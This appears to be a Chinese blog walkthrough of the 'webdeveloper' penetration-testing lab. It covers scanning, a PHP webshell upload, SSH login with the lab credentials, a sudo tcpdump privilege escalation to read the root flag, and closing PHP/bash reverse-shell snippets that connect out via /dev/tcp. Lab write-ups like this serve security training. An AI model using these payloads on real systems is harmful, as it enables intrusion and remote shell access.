webdeveloper靶场渗透实操手册

kali IP : 192.168.46.128

用nmap扫出靶机ip

在扫出开放的端口

接着dirb扫描一下目录

扫描完之后可以发现有一个ipdata的网站

用wireshark打开可以找到后台的账号和密码

账号:webdeveloper

密码:Te5eQg&4sBS!Yr$)wf%(DcAd

接着登入后台

登入之后发现又文件上传漏洞

上传一个一句话木马 php文件

上传好了之后 打开upload目录找一下刚刚上传的文件

IP/wp-content/uploads/2023

找到我们刚刚上传的php文件打开

然后用蚁剑链接这个网站可以找到web的账号密码

在kali里面登录

 ssh webdeveloper@192.168.96.132

账号:webdeveloper

密码:MasterOfTheUniverse

我们可以发现登录成功了

然后直接查看flag的话因为没有权限所以查不到

我们用tcpdump提权

sudo -l

输入刚才的密码 MasterOfTheUniverse

可以看到tcpdump的目录

创建攻击文件

touch /tmp/exploit

写入shellcode

echo 'cat /root/flag.txt' > /tmp/exploit

赋予可执行权限

chmod +x /tmp/exploit

利用tcpdump执行任意命令

sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root

-i eth0 从指定网卡捕获数据包
-w /dev/null 将捕获到的数据包输出到空设备(不输出数据包结果)
-z [command] 运行指定的命令
-Z [user] 指定用户执行命令
-G [rotate_seconds] 每秒一次的频率执行-w指定的转储
-W [num] 指定抓包数量

回车就可以看到flag啦~

反弹shell

常见的php反弹shell代码

$sock=fsockopen($ip,$port);
exec("/bin/sh -i <&3 >&3 2>&3");

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/10086 0>&1'");
?>
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值